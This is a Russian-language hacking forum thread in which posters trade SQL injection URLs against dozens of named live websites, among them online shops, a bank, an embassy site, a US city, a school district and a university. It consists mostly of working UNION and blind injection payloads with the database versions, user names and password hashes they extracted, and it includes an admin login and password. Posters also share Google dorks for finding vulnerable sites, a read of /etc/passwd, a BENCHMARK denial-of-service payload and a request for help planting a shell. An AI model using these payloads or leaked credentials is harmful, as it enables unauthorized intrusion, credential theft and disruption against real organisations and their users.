SQL Инъекции

HTML:

http://www.chinesekungfuhustle.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*

4.0.25:kungfu@localhost:kungfu

HTML:

http://ourcoffeebarn.com/estore/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*

5.0.45-communityurcoffe_osc1@localhosturcoffe_osc1 (ммм пятая версия это хорошо =))))
посмотрим что тут у нас в INFORMATION_SCHEMA.TABLES

HTML:

http://ourcoffeebarn.com/estore/customer_testimonials.php?testimonial_id=99999+union+select+1,2,TABLE_NAME,4,5,6,7,8+FROM+INFORMATION_SCHEMA.TABLES/*

HTML:

http://www.tiendaslatinas.com/centrocomercial/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*

4.1.22-standard:luis2@localhost:luis2_tienda

HTML:

http://www.signbabies.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*

4.1.20-log:[email protected]:inksp3c1_signbabies

HTML:

http://www.ameripromo.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers
/*

4.1.20-log:[email protected]:inksp3c1_ameripromo

HTML:

http://www.affiliatesexcel.com/catalog/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*

вота =)))

 

Интернет магазин
usb.brando.com.hk

Code:

http://usb.brando.com.hk/prod_list.php?dept_id=015&cat_id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,VERSION(),13,14,15,16,17,18/*

4 версия

 

http://www.at-g.ru/

Code:

http://www.at-g.ru/index.php?base_name=atg_second&id=0x3127%20union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7/*

5.0.24-standard/db_atg1/[email protected]

Code:

http://www.ac-psych.org/index.php?id=0x3127%20union+select+concat_ws(0x2F,version(),database(),user())/*

5.0.33-log/acpsych_ac-psych/[email protected]

Мои первые SQL инекций которые я сам сделал)
за это респект LoFFi, BizzyD, Piflit и it's my. Еще с 9 утра сидел чтоб все норма понять, и напряг мозги и получилось) вот так вот

 

Я нашел скуль:
http://event.zontik.ru/?cat=30'
Пробовал раскрыть его, но ничего не получается=((
Помогите пожалуйста раскрыть скуль.

 

HTML:

http://event.zontik.ru/?cat=-1'+union+select+concat_ws(0x2F,version(),database(),user())/*

5.0.41-log/zontikweb/zontik_grab@localhost
а дальше сам попробуй если не получиться помогу

стало самому интересно

HTML:

http://event.zontik.ru/?cat=-1'+union+select+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES/*

вот какие таблицы нашел :

PHP:

COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE
PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS
USER_PRIVILEGES,VIEWS,del_status,dns_a,dns_cname,dns_dep,dns_isp_dns,dns_mx,dns_nodes,dns_secondary,dns_spf,doctype,groups
help_documents,help_nodes,help_tickets,isp_com,isp_dep,isp_dienste,isp_fakt_artikel,isp_fakt_dep,isp_fakt_nodes,isp_fakt_rechnung
isp_fakt_record,isp_firewall,isp_htaccess,isp_isp_actions,isp_isp_admin,isp_isp_datenbank

LOAD_FILE:

HTML:

http://event.zontik.ru/?cat=-1'+union+select+LOAD_FILE('/etc/passwd')/*

HTML:

http://event.zontik.ru/?cat=-1'+union+select+user+from+mysql.user/*

user:whole
пароль не смог узнать (((
и шелл не получаеться залить
еси кто осилит сообщите мне плизз

 

Code:

http://www.newkurkino.ru/modules.php?op=modload&name=News&file=article&sid=0x3127%20union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*

4.0.26-log/udb223/Uwww223S@localhost

 

www.ci.petoskey.mi.us

Code:

http://www.ci.petoskey.mi.us/gallery2.php?gallery_id=-5+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5/*

5.0.27-log:cityofpetoskey@localhost:cityofpetoskey

Code:

http://www.ci.petoskey.mi.us/gallery2.php?gallery_id=-5+union+select+1,concat_ws(0x3a,id,username,password),3,4,5+from+mgr_users+limit+0,1/*

1:admin:employee104

www.warwick.k12.pa.us

Code:

http://www.warwick.k12.pa.us/news.php?id=-3+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9/*

4.0.24:root@localhost:basmati

 

KOOBI CMS

уязвимость в параметре img_id

пример поиска уязвимых сайтов в гугле

allinurl:"index.php?p=gallerypic" результатов порядка 4500 тыс. !!!

Пример уязвимого сайта:

код:

http://www.ria-alliance.com.ua/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,version(),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
________________________

для новичков!

чтоб увидеть инъекцию в действии на любом другом сайте работающем на этом движке,достаточно вставить код обозначеный красным цветом в примере уязвимого сайта.

 

PHP Live! 3.2.2

 

Code:

http://ykm.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://sotovic.org/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.cheryclub.org.ua/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.mss-design.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.atyraunews.com/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.litinstitut.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://foto-push.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.99t.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://ww.moderni-talo.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.bia-team.com/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.photocapture.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.magellan.by/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.torzhok.info/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.aagu.org.ua/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://ns64.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.blik-irk.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://fevralka.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.trust-building.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://mtt-mn.com/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.dancetrip.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.autoshoes.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://shelvergroup.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.jaray.org/home/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.laser-m.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.kvart-a.com.ua/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://dizua.com/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://artdi.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://business.clarimondgroup.com/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc

Их там дофига (ГУГЛ)))) мне уже скучно стало подставлять)
Спасибо fobofob

 

http://www.bank-peresvet.ru/ - Банк "Пересвет"

Code:

http://www.bank-peresvet.ru/article2/52/**/and/**/ascii(lower(substring((select/**/table_name/**/from/**/information_schema.columns/**/where/**/column_name=0x6964/**/limit/**/1),3,1)))%3E107/*

Здесь катит только посимвольный перебор, версия mysql точно 5-ая, я начал перебирать имя первой таблицы, в которой есть колонка id, подобрал первые 2 символа ( дальше надоело ) - co , если кому интересно - копайте дальше...

http://www.artcifra.com/ - сайт разработчиков весьма неплохой CMS

Code:

http://www.artcifra.com/index.php?act=portfolio&subact=2&count=&id=-9+union+select+1,2,cast(concat(user_name,0x3a,user_password)+as+binary),4,5,6,7,8+from+4images_users+limit+2,1/*

User: [email protected]
Version: 5.0.51-3-log
Administration: http://www.artcifra.com/admin
Login: goga
Password: 5971548

http://bolgaria.ru/ - посольство Болгарии в России

Code:

http://bolgaria.ru/news/index.php?id=-690'+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8+from+forums_auth/*

Version: 5.0.45
User: bulgaria@localhost

 

Code:

http://livre.ru/change/index.php?id=0x3127%20union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*

4.1.22/links_exchange/linkuser@localhost

Code:

http://program.org.ua/index.php?cat=0x3127%20union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9,10,11,12/*

5.0.45-log/freeware/freeware@localhost

Code:

http://www.polkaudio.com/education/article.php?id=0x3127%20union+select+1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()),8,9/*

5.0.37/polk/webuser@localhost

Code:

http://www.pnevmo.ru/index.php?cat_id=1'%20union+select+1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*

4.1.20-log/db_laaqer_3/[email protected]

 

xcedz пусть мне поставят минусы НО за*бал ! я тебе уже писал чтобы ты не писал идиотским шрифтом а тем более ещё более идиотским ЦВЕТОМ !!!!!
// извиняюсь за хамство //

 

HTML:

http://www.murmanspas.ru/index.php?p=gallerypic&img_id=-666+union+select+1,2,3,version(),5,6,7,8,9/*&galid=32&church=1&ascdesc=desc

4.1.21

http://www.murmanspas.ru/index.php?p=gallerypic&img_id=-666+union+select+1,2,3,BENCHMARK(666666666666666666666666,BENCHMARK(100000,md5(current_time))),5,6,7,8,9/*&galid=32&church=1&ascdesc=desc
АДский смех

HTML:

http://www.hair-band.com/index.php?option=com_quiz&task=user_tst_shw&Itemid=47&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*

 

ПР-7 вроде.

http://www2.umaine.edu/graduate/article.php?id=-63'+union+select+1,concat_ws(0x3A3a,username,password),3,4+from+users+limit+0,1/*

Пассы расшифровываются, но к админке не подходят.

 

_http://maps.mail.ru/msk/route.asp?tr1='/*&tr2='/*

 

Это не sql инъекция Ругается на любой символ. Кавычки тут вообще не причем, они фильтруются.

 

http://www.viking.tm/product.php?id=-91+union+select+1,table_name,3,4,5,6,7+from+information_schema.tables--
Картинки надо вырубать

 

Code:

http://www.ac.org.tr/news.php?id=0x3127%20union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7/*

5.0.45-log/avrasya/[email protected]

Code:

http://www.lybid-realty.com.ua/index.php?w=new&id=0x3127%20union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5/*

4.1.22/lybidrealty/u_lybidrealt@localhost

Code:

http://enazindan1kisi.com/news.php?id=0x3127%20union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5/*

5.0.45-community/enazinda_v1/enazinda_v1@localhost

Code:

http://italia.allaboutjazz.com/php/news.php?id=0x3127%20union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*

4.1.20/italy/vxweb@jazzy

Code:

http://www.architectureforhumanityitaly.org/news.php?id=0x3127%20union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8,9/*

5.0.45-community-log/Sql85662_1/[email protected]

 

PHP:

http://nodel.org/events.php?ID=-1%2527%2520+union+select+1,2,3,4,5,6,7,8,TABLE_NAME,1,2,3,4,5,6,7+from+information_schema.tables+limit+1,1--

PHP:

http://www.ultraproducts.com/st_content.php?id=-1+union+select+1,2,CONCAT(user(),version(),database())--